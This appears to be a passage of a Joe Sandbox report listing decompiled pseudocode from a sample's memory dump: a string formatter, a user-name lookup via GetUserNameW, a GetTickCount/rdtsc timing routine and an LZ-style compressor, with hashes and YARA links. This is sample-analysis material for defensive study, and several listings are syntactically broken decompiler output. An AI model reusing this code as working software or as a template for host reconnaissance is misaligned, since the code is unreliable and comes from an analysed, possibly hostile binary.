Instruction Fuzzy Hash: 48419F75604301AFD721AFACE889B2ABBE5BF84304F49442EF94987352E671EE14C653

Uniqueness

Uniqueness Score: -1.00%

Function 005CF0E0, Relevance: 1.8, APIs: 1, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E005CF0E0() {
				short* _t72;
				short* _t73;
				signed char _t74;
				signed char* _t76;
				void* _t80;
				void* _t82;
				void* _t85;
				short** _t90;
				short* _t97;
				void* _t102;
				char* _t106;
				signed char _t108;
				signed char _t109;
				short** _t113;
				short** _t114;
				signed char _t116;
				unsigned int _t118;
				short** _t123;
				short** _t126;
				void* _t127;
				short** _t132;
				signed int _t133;
				void* _t136;
				short** _t138;
				short* _t141;
				signed int _t143;
				short** _t145;
				signed int _t146;
				signed int _t148;
				short** _t153;
				short** _t154;
				short*** _t155;
				char _t173;
				short** _t181;

				_t113 = _t155[0x10f];
				_t148 = _t155[0x10e];
				 *_t155 =  &(_t155[0x111]);
				_t132 = _t113 + _t148;
				if(_t113 > 0) {
					_t153 = _t155[0x110];
					_t148 = _t155[0x10e];
					_t72 =  *_t153;
					if(_t72 != 0) {
						_t155[1] = _t132;
						_t133 = _t155[0x10e];
						_t155[7] =  ~_t133 - _t113;
						_t148 = _t133;
						_t132 = _t155[1];
						do {
							if(_t72 != 0x25) {
								 *_t148 = _t72;
								goto L10;
							} else {
								_t73 = _t153[0];
								_t114 =  &(_t153[0]);
								_t155[8] = 0;
								if(_t73 + 0xd0 > 9) {
									_t74 = 0x20;
								} else {
									_t154 =  &(_t153[0]);
									_t146 = 0;
									_t141 = _t73;
									do {
										_t146 = _t141 + (_t146 + _t146 * 4) * 2 - 0x30;
										_t141 =  *_t154;
										_t154 =  &(_t154[0]);
									} while (_t141 + 0xd0 < 0xa);
									do {
										_t143 = _t114[0];
										_t114 =  &(_t114[0]);
										_t102 = _t143 + 0xd0;
									} while (_t102 < 0xa);
									_t74 = (_t143 & 0xffffff00 | _t102 == 0x00000030) << 0x00000004 | 0x00000020;
								}
								_t132 = _t155[1];
								if(_t74 == 0x6c) {
									_t74 = _t114[0];
									_t114 =  &(_t114[0]);
								}
								_t153 = _t114;
								if(_t74 > 0x57) {
									_t155[2] = _t74;
									_t116 = _t74 + 0x90;
									if(_t116 > 8) {
										if(_t74 == 0x58) {
											_t75 =  *_t155;
											_t136 = 0;
											_t44 =  &(_t75[1]); // 0x24
											 *_t155 = _t44;
											_t118 =  *( *_t155);
											_t76 =  &(_t155[6]);
											_t155[6] = 0;
											while(_t118 != 0) {
												_t108 = _t118 & 0x0000000f;
												if(_t108 < 0xa) {
													_t109 = _t108 | 0x00000030;
												} else {
													_t109 = _t108 + 0x37;
												}
												_t136 = _t136 + 1;
												 *_t76 = _t109;
												_t76 = _t76 - 1;
												_t118 = _t118 >> 4;
												if(_t136 < 8) {
													continue;
												}
												goto L50;
											}
											goto L50;
										} else {
											if(_t74 == 0x64) {
												_t91 =  *_t155;
												_t106 =  &(_t155[8]);
												_t36 =  &(_t91[1]); // 0x24
												 *_t155 = _t36;
												_push(_t106);
												_push( *( *_t155));
												E005C5BE0();
												goto L36;
											}
										}
									} else {
										switch( *((intOrPtr*)((_t116 & 0x000000ff) * 4 +  &M005CF408))) {
											case 0:
												_t94 =  *_t155;
												_t139 = 0;
												_t31 =  &(_t94[1]); // 0x24
												 *_t155 = _t31;
												_t130 =  *( *_t155);
												_t95 =  &(_t155[6]);
												_t155[6] = 0;
												do {
													_t111 = _t130 & 0x0000000f;
													if(_t111 < 0xa) {
														_t112 = _t111 | 0x00000030;
													} else {
														_t112 = _t111 + 0x37;
													}
													_t139 = _t139 + 1;
													 *(_t95 - 1) = _t112;
													_t95 = _t95 - 1;
													_t130 = _t130 >> 4;
												} while (_t139 < 8);
												goto L51;
											case 1:
												goto L65;
											case 2:
												__eax =  *__esp;
												__ecx =  &(__eax[4]);
												 *__esp =  &(__eax[4]);
												if( *__eax != 0) {
													goto L53;
												} else {
												}
												goto L65;
											case 3:
												__eax =  *__esp;
												__ecx =  &(__eax[4]);
												 *__esp =  &(__eax[4]);
												__eax = E005C81C0( *__eax,  &(__esp[8]));
												L36:
												_t132 = _t155[3];
												_t155 =  &(_t155[2]);
												goto L53;
											case 4:
												__eax =  *__esp;
												__edx = 0;
												_t41 =  &(__eax[4]); // 0x4
												__ecx = _t41;
												 *__esp = _t41;
												__ecx =  *( *__esp);
												__eax =  &(__esp[6]);
												__esp[6] = 0;
												while(__ecx != 0) {
													if((__ecx & 0x0000000f) < 0xa) {
														__bl = __bl | 0x00000030;
													} else {
														__bl = __bl + 0x57;
													}
													__edx = __edx + 1;
													 *__eax = __bl;
													__eax = __eax - 1;
													__ecx = __ecx >> 4;
													if(__edx < 8) {
														continue;
													} else {
													}
													break;
												}
												L50:
												_t77 =  &(_t76[1]);
												L51:
												_t106 =  &(_t155[0xa]);
												E005CC400(_t106, _t77,  &(_t155[7]) - _t77);
												_t155 =  &(_t155[3]);
												goto L52;
										}
									}
									goto L65;
								} else {
									if(_t74 == 0x25) {
										 *_t148 = 0x25;
										L10:
										_t148 = _t148 + 1;
										goto L65;
									} else {
										if(_t74 != 0x53) {
											if(_t74 != 0) {
												goto L65;
											} else {
											}
										} else {
											_t155[2] = _t74;
											_t96 =  *_t155;
											_t106 =  &(_t155[8]);
											_t26 =  &(_t96[1]); // 0x24
											 *_t155 = _t26;
											_t97 =  *( *_t155);
											if(_t97 != 0) {
												_t106 =  &(_t155[0xb]);
												WideCharToMultiByte(0xfde9, 0, _t97, 0xffffffff, _t106, 0x400, 0, 0);
												L52:
												_t132 = _t155[1];
											}
											L53:
											_t80 = _t132 - _t148;
											if( *_t106 != 0) {
												_t127 = 0;
												do {
													_t173 = _t106[_t127 + 1];
													_t127 = _t127 + 1;
												} while (_t173 != 0);
											}
											_t138 =  <  ? 0 : _t80 - 1;
											_t82 = 0 - _t138;
											_t155[3] = _t138;
											if(_t82 > 0 && _t148 < _t155[1] && _t82 != 0) {
												_t85 = _t155[7] + _t148;
												_t123 = _t155[3];
												_t124 =  <  ? _t85 : _t123;
												_t125 =  ~( <  ? _t85 : _t123);
												E005D6610(_t148, _t155[2] & 0x000000ff,  ~( <  ? _t85 : _t123));
												_t126 = _t155[4];
												_t155 =  &(_t155[3]);
												_t90 =  &(_t155[3][0]);
												while(1) {
													_t148 = _t148 + 1;
													if(_t148 >= _t126) {
														goto L64;
													}
													_t181 = _t90;
													_t90 =  &(_t90[0]);
													if(_t181 != 0) {
														continue;
													}
													goto L64;
												}
											}
											L64:
											_t145 = _t155[3];
											E005CC400(_t148, _t106, _t145);
											_t132 = _t155[4];
											_t155 =  &(_t155[3]);
											_t148 = _t145 + _t148;
											L65:
											if(_t148 < _t132) {
												goto L66;
											}
										}
									}
								}
							}
							goto L67;
							L66:
							_t72 = _t153[0];
							_t153 =  &(_t153[0]);
						} while (_t72 != 0);
					}
				}
				L67:
				_t70 =  <  ? _t148 : _t132 - 1;
				 *((char*)( <  ? _t148 : _t132 - 1)) = 0;
				return _t148 - _t155[0x10e];
			}

0x005cf0ea
0x005cf0f1
0x005cf0ff
0x005cf102
0x005cf107
0x005cf10d
0x005cf114
0x005cf11b
0x005cf120
0x005cf126
0x005cf12a
0x005cf137
0x005cf13b
0x005cf13d
0x005cf141
0x005cf143
0x005cf196
0x00000000
0x005cf145
0x005cf145
0x005cf148
0x005cf14b
0x005cf158
0x005cf1a0
0x005cf15a
0x005cf15a
0x005cf15d
0x005cf15f
0x005cf161
0x005cf167
0x005cf16b
0x005cf16e
0x005cf174
0x005cf179
0x005cf179
0x005cf17c
0x005cf17f
0x005cf182
0x005cf191
0x005cf191
0x005cf1a2
0x005cf1a8
0x005cf1aa
0x005cf1ad
0x005cf1ad
0x005cf1ae
0x005cf1b2
0x005cf203
0x005cf207
0x005cf20d
0x005cf25d
0x005cf302
0x005cf305
0x005cf307
0x005cf30a
0x005cf30d
0x005cf30f
0x005cf313
0x005cf318
0x005cf31e
0x005cf324
0x005cf32b
0x005cf326
0x005cf326
0x005cf326
0x005cf32e
0x005cf32f
0x005cf331
0x005cf332
0x005cf338
0x00000000
0x00000000
0x00000000
0x005cf338
0x00000000
0x005cf263
0x005cf265
0x005cf26b
0x005cf26e
0x005cf272
0x005cf275
0x005cf278
0x005cf279
0x005cf27b
0x00000000
0x005cf27b
0x005cf265
0x005cf20f
0x005cf212
0x00000000
0x005cf219
0x005cf21c
0x005cf21e
0x005cf221
0x005cf224
0x005cf226
0x005cf22a
0x005cf22f
0x005cf231
0x005cf237
0x005cf23e
0x005cf239
0x005cf239
0x005cf239
0x005cf241
0x005cf242
0x005cf245
0x005cf246
0x005cf249
0x00000000
0x00000000
0x00000000
0x00000000
0x005cf28f
0x005cf292
0x005cf295
0x005cf29c
0x00000000
0x00000000
0x005cf2a2
0x00000000
0x00000000
0x005cf2a7
0x005cf2ae
0x005cf2b1
0x005cf2b7
0x005cf2bc
0x005cf2bc
0x005cf2c0
0x00000000
0x00000000
0x005cf2c8
0x005cf2cb
0x005cf2cd
0x005cf2cd
0x005cf2d0
0x005cf2d3
0x005cf2d5
0x005cf2d9
0x005cf2de
0x005cf2ea
0x005cf2f1
0x005cf2ec
0x005cf2ec
0x005cf2ec
0x005cf2f4
0x005cf2f5
0x005cf2f7
0x005cf2f8
0x005cf2fe
0x00000000
0x00000000
0x005cf300
0x00000000
0x005cf2fe
0x005cf33a
0x005cf33a
0x005cf33b
0x005cf343
0x005cf348
0x005cf34d
0x00000000
0x00000000
0x005cf212
0x00000000
0x005cf1b4
0x005cf1b6
0x005cf253
0x005cf198
0x005cf198
0x00000000
0x005cf1bc
0x005cf1be
0x005cf284
0x00000000
0x00000000
0x005cf28a
0x005cf1c4
0x005cf1c4
0x005cf1c8
0x005cf1cb
0x005cf1cf
0x005cf1d2
0x005cf1d5
0x005cf1d9
0x005cf1e8
0x005cf1f6
0x005cf350
0x005cf350
0x005cf350
0x005cf354
0x005cf356
0x005cf35b
0x005cf35d
0x005cf35f
0x005cf35f
0x005cf364
0x005cf364
0x005cf369
0x005cf374
0x005cf377
0x005cf379
0x005cf37d
0x005cf391
0x005cf394
0x005cf398
0x005cf3a0
0x005cf3a5
0x005cf3aa
0x005cf3ae
0x005cf3b6
0x005cf3b8
0x005cf3b8
0x005cf3bb
0x00000000
0x00000000
0x005cf3bd
0x005cf3bf
0x005cf3c2
0x00000000
0x00000000
0x00000000
0x005cf3c2
0x005cf3b8
0x005cf3c4
0x005cf3c4
0x005cf3cb
0x005cf3d0
0x005cf3d4
0x005cf3d7
0x005cf3d9
0x005cf3db
0x00000000
0x00000000
0x005cf3db
0x005cf1be
0x005cf1b6
0x005cf1b2
0x00000000
0x005cf3dd
0x005cf3dd
0x005cf3e0
0x005cf3e1
0x005cf141
0x005cf120
0x005cf3e9
0x005cf3ee
0x005cf3f8
0x005cf407

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 005CF1F6

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 41774ea48b953fadd3b135c4db78b7d699a745bfb678e754e8353c0da9d1abde
Instruction ID: cc69dfbce3b9af90d55edd82570b4aa63e2bf6b0f02b26e5bb2528fcc9824da2
Opcode Fuzzy Hash: 41774ea48b953fadd3b135c4db78b7d699a745bfb678e754e8353c0da9d1abde
Instruction Fuzzy Hash: F5A1D6342087859FDB19CE58C894FAEBFE2FFC5704F08892DE4D687245D630994ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 005D1960, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E005D1960(void* __eflags, intOrPtr _a4) {
				char _v526;
				char _v726;
				DWORD* _t6;
				WCHAR* _t14;
				DWORD* _t16;

				_t6 = _t16;
				_t14 =  &_v526;
				 *_t6 = 0x100;
				GetUserNameW(_t14, _t6);
				E005D4520( &_v726, 0x65);
				_push(_t14);
				return 0 | E005D4610(_a4, 0xe,  &_v726) != 0x00000000;
			}

0x005d1970
0x005d1972
0x005d1979
0x005d1981
0x005d198e
0x005d1996
0x005d19b5

APIs

GetUserNameW.ADVAPI32(?), ref: 005D1981

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fc60ee403f2121f0c9c2ec8e0859168ca2c7aa2227434d0e17b8070a76b2f212
Instruction ID: 31e72e20082b472683b6e24bbbcad0e635ba9e84d3206b976b934158dc176a85
Opcode Fuzzy Hash: fc60ee403f2121f0c9c2ec8e0859168ca2c7aa2227434d0e17b8070a76b2f212
Instruction Fuzzy Hash: 88E09B766412452BF7307618FC8EFAB772CDBD1711F000417F945A7281E2B45D5596B2

Uniqueness

Uniqueness Score: -1.00%

Function 005C8160, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E005C8160(intOrPtr __edx) {
				intOrPtr _v8;
				signed char _v12;
				signed int _v16;
				long _t10;
				signed char _t11;
				long _t13;
				intOrPtr _t15;
				signed int _t19;

				_t15 = __edx;
				_t10 = GetTickCount();
				_t13 = _t10;
				asm("rdtsc");
				_v12 = _t10;
				_v8 = _t15;
				_t11 = _v12;
				_v16 = 1;
				if((_t11 * 0x00000008 & 0x000007f8) != 0) {
					_t19 =  ~((_t11 & 0x000000ff) << 3);
					do {
						_v16 = _v16 << 0x10;
						_t19 = _t19 + 1;
					} while (_t19 != 0);
				}
				return _t13 + _t11;
			}

0x005c8160
0x005c8169
0x005c816f
0x005c8171
0x005c8173
0x005c8177
0x005c817b
0x005c817f
0x005c8194
0x005c819c
0x005c819e
0x005c819e
0x005c81a3
0x005c81a3
0x005c819e
0x005c81ad

APIs

GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: bc2a842c14334f88e64a9bb6896613cda198da0f8513d241769b183ff202d201
Instruction ID: 791a9729bd2c524664e1300e2e17d8cabedee07cbb05ae7457865d568a56a4ff
Opcode Fuzzy Hash: bc2a842c14334f88e64a9bb6896613cda198da0f8513d241769b183ff202d201
Instruction Fuzzy Hash: F4E06D705197055FE704DB1CD804769BBE2F7C4310F44CA6EE8AE836A4FB759810DA82

Uniqueness

Uniqueness Score: -1.00%

Function 005D35E0, Relevance: .4, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E005D35E0() {
				signed int _t144;
				signed int _t147;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t165;
				signed char _t170;
				signed char _t172;
				void* _t181;
				signed char _t186;
				signed int _t187;
				signed char _t198;
				signed char _t205;
				signed char _t221;
				signed int _t224;
				void* _t225;
				void* _t226;
				signed int _t227;
				signed int _t229;
				signed char _t231;
				signed int _t236;
				signed char _t237;
				signed int _t238;
				signed int _t245;
				signed int _t251;
				signed char _t252;
				signed char _t257;
				signed char _t262;
				signed int _t266;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed char _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				unsigned int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed char _t290;
				signed int _t291;
				signed int _t301;
				signed int _t302;
				signed char _t303;
				signed int _t305;
				signed char _t306;
				signed int _t311;
				signed int* _t313;
				signed char _t316;
				signed char _t317;
				signed char _t318;
				signed int _t319;
				signed char _t320;
				signed int _t324;
				signed int _t326;
				signed char* _t327;
				signed char _t328;
				signed int _t330;
				signed char _t331;
				signed char* _t335;
				signed char _t336;
				signed int* _t338;
				void* _t342;

				_t319 = _t338[0xd];
				_t306 = _t338[0xe];
				_t144 = _t338[0xf];
				_t224 = _t338[0xc];
				_t231 = _t306;
				_t266 = _t319;
				if(_t319 >= 0xe) {
					_t302 = _t224 + 4;
					_t237 = _t306;
					_t338[3] = _t224;
					_t338[6] = _t224 + _t319 - 0xd;
					_t338[5] = _t224 + _t319;
					do {
						_t227 = _t338[0x10];
						_t303 = _t302 + 4;
						_t338[1] = _t237;
						do {
							_t238 =  *(_t303 - 1) & 0x000000ff;
							_t157 =  *(_t303 - 2) & 0x000000ff;
							_t35 = _t303 - 4; // -8
							_t273 = _t35;
							 *_t338 = _t273;
							_t338[2] = _t238;
							_t338[4] = _t157;
							_t245 = (( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) << 5) + ( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) >> 5;
							_t324 = _t245 & 0x00003fff;
							_t158 =  *(_t227 + _t324 * 4);
							if(_t158 >= _t338[0xc]) {
								_t274 = _t273 - _t158;
								_t41 = _t274 - 1; // -9
								__eflags = _t41 - 0xbffe;
								if(_t41 <= 0xbffe) {
									__eflags = _t274 - 0x801;
									_t229 = _t274;
									if(_t274 >= 0x801) {
										_t275 = _t338[2];
										_t311 = _t338[0x10];
										__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
										if( *((intOrPtr*)(_t158 + 3)) != _t275) {
											_t324 = _t245 & 0x000007ff ^ 0x0000201f;
											_t158 =  *(_t311 + _t324 * 4);
											__eflags = _t158 - _t338[0xc];
											if(_t158 < _t338[0xc]) {
												goto L23;
											} else {
												_t229 =  *_t338 - _t158;
												_t53 = _t229 - 1; // -9
												__eflags = _t53 - 0xbffe;
												if(_t53 <= 0xbffe) {
													__eflags = _t229 - 0x801;
													if(_t229 < 0x801) {
														goto L18;
													} else {
														__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
														if( *((intOrPtr*)(_t158 + 3)) == _t275) {
															goto L18;
														} else {
															goto L23;
														}
													}
												} else {
													goto L23;
												}
											}
										} else {
											goto L18;
										}
									} else {
										_t311 = _t338[0x10];
										L18:
										__eflags = ( *_t158 & 0x0000ffff) -  *(_t303 - 4);
										if(( *_t158 & 0x0000ffff) !=  *(_t303 - 4)) {
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t158 + 2)) - _t338[4];
											if( *((intOrPtr*)(_t158 + 2)) != _t338[4]) {
												goto L23;
											} else {
												_t338[4] = _t158;
												_t162 =  *_t338;
												_t251 = _t338[3];
												_t338[2] = _t229;
												 *(_t311 + _t324 * 4) = _t162;
												_t278 = _t162 - _t251;
												__eflags = _t278;
												if(_t278 <= 0) {
													 *_t338 = _t251;
													_t252 = _t338[1];
													_t224 = _t338[0xc];
												} else {
													_t262 = _t338[1];
													_t224 = _t338[0xc];
													__eflags = _t278 - 3;
													_t317 = _t278;
													if(_t278 > 3) {
														__eflags = _t278 - 0x12;
														if(_t278 > 0x12) {
															_t290 = _t278 - 0x12;
															_t335 = _t262 + 1;
															 *_t262 = 0;
															__eflags = _t290 - 0x100;
															if(_t290 >= 0x100) {
																E005D6610(_t335, 0, ((0xfffffeee - _t338[3] + _t162) * 0x80808081 >> 0x20 >> 7) + 1);
																_t338 =  &(_t338[3]);
																_t290 = (( *_t338 - 0x112 - _t338[3]) * 0x80808081 >> 0x20 >> 7) - (0x80808081 << 8) +  *_t338 - 0x111 - _t338[3];
																__eflags = _t290;
																_t221 =  &(_t335[0xffffffff80808081]);
																_t335 = _t338[1] + 0xffffffff80808083;
																_t262 = _t221;
															}
															_t262 = _t262 + 2;
															__eflags = _t262;
															 *_t335 = _t290;
														} else {
															 *_t262 = _t278 + 0xfd;
															_t262 = _t262 + 1;
														}
													} else {
														 *(_t262 - 2) =  *(_t262 - 2) | _t278;
													}
													_t291 = _t338[3];
													_t205 = 0;
													__eflags = 0;
													_t336 = _t317;
													do {
														_t318 = _t262;
														 *((char*)(_t318 + _t205)) =  *((intOrPtr*)(_t291 + _t205));
														_t205 = _t205 + 1;
														_t262 = _t318;
														__eflags = _t336 - _t205;
													} while (_t336 != _t205);
													_t252 = _t262 + _t336;
													__eflags = _t252;
												}
												_t279 = _t338[4];
												__eflags =  *((intOrPtr*)(_t279 + 3)) -  *(_t303 - 1);
												if( *((intOrPtr*)(_t279 + 3)) !=  *(_t303 - 1)) {
													L57:
													_t302 = _t303 - 1;
													_t280 = _t338[2];
													_t306 = _t338[0xe];
													_t165 = _t302 -  *_t338;
													__eflags = _t280 - 0x800;
													if(_t280 > 0x800) {
														__eflags = _t280 - 0x4000;
														if(_t280 > 0x4000) {
															_t281 = _t280 + 0xffffc000;
															_t327 = _t252;
															_t257 =  &(_t327[1]);
															__eflags = _t257;
															 *_t327 = _t165 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
														} else {
															_t281 = _t280 - 1;
															_t172 = _t165 + 0x000000fe | 0x00000020;
															__eflags = _t172;
															goto L61;
														}
														goto L63;
													} else {
														_t283 = _t280 - 1;
														_t328 = _t252;
														_t282 = _t283 >> 3;
														_t257 = _t328;
														 *_t328 = (_t165 << 5) + 0xe0 + (_t283 & 0x00000007) * 4;
													}
												} else {
													__eflags =  *((intOrPtr*)(_t279 + 4)) -  *_t303;
													if( *((intOrPtr*)(_t279 + 4)) !=  *_t303) {
														_t303 = _t303 + 1;
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t279 + 5)) -  *(_t303 + 1);
														if( *((intOrPtr*)(_t279 + 5)) !=  *(_t303 + 1)) {
															_t303 = _t303 + 2;
															goto L57;
														} else {
															__eflags =  *((intOrPtr*)(_t279 + 6)) -  *(_t303 + 2);
															if( *((intOrPtr*)(_t279 + 6)) !=  *(_t303 + 2)) {
																_t303 = _t303 + 3;
																goto L57;
															} else {
																__eflags =  *((intOrPtr*)(_t279 + 7)) -  *(_t303 + 3);
																if( *((intOrPtr*)(_t279 + 7)) !=  *(_t303 + 3)) {
																	_t303 = _t303 + 4;
																	__eflags = _t303;
																	goto L57;
																} else {
																	__eflags =  *((intOrPtr*)(_t279 + 8)) -  *(_t303 + 4);
																	_t303 = _t303 + 5;
																	if(__eflags != 0) {
																		goto L57;
																	} else {
																		_t284 = _t338[5];
																		__eflags = _t303 - _t284;
																		if(_t303 < _t284) {
																			_t316 = _t338[4] + 9;
																			__eflags = _t316;
																			while(1) {
																				__eflags =  *_t316 -  *_t303;
																				if( *_t316 !=  *_t303) {
																					goto L50;
																				}
																				_t303 = _t303 + 1;
																				_t316 = _t316 + 1;
																				__eflags = _t303 - _t284;
																				if(_t303 < _t284) {
																					continue;
																				}
																				goto L50;
																			}
																		}
																		L50:
																		_t285 = _t338[2];
																		_t181 = _t303 -  *_t338;
																		__eflags = _t285 - 0x4000;
																		if(_t285 > 0x4000) {
																			_t306 = _t338[0xe];
																			_t281 = _t285 + 0xffffc000;
																			__eflags = _t181 - 9;
																			if(_t181 > 9) {
																				_t338[2] = _t281;
																				_t286 = _t181 + 0xfffffff7;
																				_t186 = _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
																				__eflags = _t186;
																				goto L6;
																			} else {
																				_t172 = _t181 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
																				L61:
																				 *_t252 = _t172;
																				_t257 = _t252 + 1;
																			}
																		} else {
																			_t306 = _t338[0xe];
																			__eflags = _t181 - 0x21;
																			_t338[2] = _t285 - 1;
																			if(_t181 > 0x21) {
																				_t286 = _t181 + 0xffffffdf;
																				_t186 = 0x20;
																				L6:
																				 *_t252 = _t186;
																				_t313 = _t252 + 1;
																				__eflags = _t286 - 0x100;
																				_t187 = _t286;
																				if(_t286 >= 0x100) {
																					 *_t338 = _t187;
																					_t330 = ( *_t338 - 0x100) * 0x80808081 >> 0x20 >> 7;
																					_t20 = _t330 + 1; // 0x80808082
																					_t338[4] = _t252;
																					E005D6610(_t313, 0, _t20);
																					_t338 =  &(_t338[3]);
																					_t331 = _t330 - (_t330 << 8);
																					__eflags = _t331;
																					 *_t338 =  *_t338 + _t331 - 0xff;
																					_t198 = _t313 + _t330;
																					_t313 = _t338[1] + _t330 + 2;
																					_t252 = _t198;
																					_t187 =  *_t338;
																				}
																				 *_t313 = _t187;
																				_t306 = _t338[0xe];
																				_t257 = _t252 + 2;
																				__eflags = _t257;
																				goto L9;
																			} else {
																				 *_t252 = _t181 + 0x000000fe | 0x00000020;
																				_t257 = _t252 + 1;
																				L9:
																				_t281 = _t338[2];
																				goto L63;
																			}
																			goto L64;
																		}
																		L63:
																		_t282 = _t281 >> 6;
																		_t170 = _t281 << 2;
																		__eflags = _t170;
																		 *_t257 = _t170;
																	}
																}
															}
														}
													}
												}
												goto L64;
											}
										}
									}
								} else {
									_t311 = _t338[0x10];
									goto L23;
								}
							} else {
								_t311 = _t227;
								goto L23;
							}
							L67:
							_t266 = _t276 - _t305;
							 *_t326 = _t231 - _t306;
							_t144 = _t326;
							_t319 = _t338[0xd];
							goto L68;
							L23:
							_t54 = _t303 + 1; // -3
							_t227 = _t311;
							_t342 = _t303 + 0xfffffffd - _t338[6];
							_t303 = _t54;
							 *(_t311 + _t324 * 4) =  *_t338;
						} while (_t342 < 0);
						_t305 = _t338[3];
						_t326 = _t338[0xf];
						_t306 = _t338[0xe];
						_t276 = _t338[5];
						_t231 = _t338[1];
						_t224 = _t338[0xc];
						goto L67;
						L64:
						 *(_t257 + 1) = _t282;
						_t237 = _t257 + 2;
						__eflags = _t302 - _t338[6];
						_t326 = _t338[0xf];
						_t276 = _t338[5];
						_t338[3] = _t302;
					} while (_t302 < _t338[6]);
					goto L67;
				}
				L68:
				if(_t266 != 0) {
					_t301 = _t266;
					if(_t231 != _t306 || _t266 > 0xee) {
						__eflags = _t266 - 3;
						if(_t266 > 3) {
							__eflags = _t266 - 0x12;
							if(_t266 > 0x12) {
								_t225 = _t266 - 0x12;
								 *_t231 = 0;
								__eflags = _t225 - 0x100;
								if(_t225 >= 0x100) {
									_t338[1] = _t231;
									__eflags = 0x80808081;
									E005D6610(_t338[1] + 1, 0, ((_t266 - 0x112) * 0x80808081 >> 0x20 >> 7) + 1);
									_t236 = _t338[4];
									_t338 =  &(_t338[3]);
									do {
										_t225 = _t225 + 0xffffff01;
										_t236 = _t236 + 1;
										__eflags = _t225 - 0xff;
									} while (_t225 > 0xff);
									_t266 = _t301;
								}
								 *(_t231 + 1) = _t225;
								_t224 = _t338[0xc];
								_t231 = _t231 + 2;
								__eflags = _t231;
							} else {
								 *_t231 = _t266 + 0xfd;
								_t231 = _t231 + 1;
							}
						} else {
							 *(_t231 - 2) =  *(_t231 - 2) | _t266;
						}
					} else {
						_t231 = _t306 + 1;
						 *_t306 = _t266 + 0x11;
					}
					_t226 = _t224 + _t319;
					_t320 = _t231;
					_t147 =  ~_t266;
					do {
						 *_t231 =  *((intOrPtr*)(_t226 + _t147));
						_t231 = _t231 + 1;
						_t147 = _t147 + 1;
					} while (_t147 != 0);
					_t144 = _t338[0xf];
					_t231 = _t320 + _t301;
				}
				 *_t231 = 0x11;
				 *(_t231 + 2) = 0;
				 *_t144 = _t231 + 3 - _t306;
				return 0;
			}

0x005d35e7
0x005d35eb
0x005d35ef
0x005d35f3
0x005d35fa
0x005d35fc
0x005d35fe
0x005d360b
0x005d360e
0x005d3610
0x005d3614
0x005d3618
0x005d36d7
0x005d36d7
0x005d36db
0x005d36de
0x005d36e2
0x005d36e2
0x005d36e6
0x005d36f2
0x005d36f2
0x005d36f5
0x005d36f8
0x005d36ff
0x005d371a
0x005d371f
0x005d3725
0x005d372a
0x005d3730
0x005d3732
0x005d3735
0x005d373b
0x005d3743
0x005d3749
0x005d374b
0x005d3753
0x005d3757
0x005d375b
0x005d375e
0x005d377c
0x005d3782
0x005d3785
0x005d3789
0x00000000
0x005d378b
0x005d378e
0x005d3790
0x005d3793
0x005d3799
0x005d37ba
0x005d37c0
0x00000000
0x005d37c2
0x005d37c2
0x005d37c5
0x00000000
0x005d37c7
0x00000000
0x005d37c7
0x005d37c5
0x00000000
0x00000000
0x00000000
0x005d3799
0x00000000
0x00000000
0x00000000
0x005d374d
0x005d374d
0x005d3760
0x005d3763
0x005d3767
0x00000000
0x005d3769
0x005d376d
0x005d3770
0x00000000
0x005d3772
0x005d37c9
0x005d37cd
0x005d37d0
0x005d37d4
0x005d37da
0x005d37dd
0x005d37df
0x005d37e1
0x005d37fa
0x005d37fd
0x005d3801
0x005d37e3
0x005d37e3
0x005d37e7
0x005d37eb
0x005d37ee
0x005d37f0
0x005d380a
0x005d380d
0x005d3818
